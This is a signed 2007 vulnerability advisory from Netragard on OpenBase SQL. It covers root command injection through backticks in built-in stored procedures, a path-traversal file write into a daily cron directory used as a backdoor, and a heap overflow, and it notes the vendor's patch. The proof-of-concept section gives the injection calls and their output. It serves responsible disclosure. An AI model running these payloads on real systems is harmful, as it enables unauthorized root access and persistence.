-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

********************** Netragard,  L.L.C  Advisory**********************
Penetration Testing, Vulnerability Assessments, Web Application Security    

                    Strategic Reconnaissance Team
              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."

[POSTING NOTICE]
- --------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com


[Advisory Information]
- --------------------------------------------------------------------------
Contact        : Adriel T. Desautels
Researcher      : Kevin Finisterre
Advisory ID      : NETRAGARD-20070313
Product Name      : OpenBase SQL Relational Database
Product Version      : <= OpenBase 10.0.5 (All Platforms)
Vendor Name      : OpenBase International, Ltd.
Type of Vulnerability    : Remote Buffer Overflow, Command injection
Effort        : Easy

[Product Description]
- --------------------------------------------------------------------------
"For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.

OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide."

- -- http://openbase.com/home-Aboutus.html  --

[Technical Summary]
- --------------------------------------------------------------------------
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.

The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.

The second vulnerability discovered in Buffer Overflow that causes heap
corruption. This also has the potential to lead to the execution of
arbitrary code or a Denial of Service condition.


[Technical Details]
- --------------------------------------------------------------------------
1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Success
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1>  call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Failure
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root

An exploitable vulnerability exists in OpenBase in the creation of
Stored Procedures that can be used to gain NT AUTHORITY\SYSTEM or root
level privileges. Specifically, a user can create a stored procedure
with an unusually long name which will and trigger a buffer overflow
condition that will result in heap corruption. If done properly, an
attacker may be able to execute arbitrary commands against the affected
system.


[Proof Of Concept]
- --------------------------------------------------------------------------
See Above

[Vendor Status]
- --------------------------------------------------------------------------
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:

"OpenBase now runs as the 'openbase' user for security reasons.  I would
like to publically thank Kevin Finisterre for his input."

[Disclaimer]
- ------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHL3dgQwbn1P9Iaa0RAkTrAKChtXX9q5LcP5m9DRb2SYZ1E0JipgCfaDXn
yu4Rt3X3CIzaDSJJm+SWUwo=
=EQxH
-----END PGP SIGNATURE-----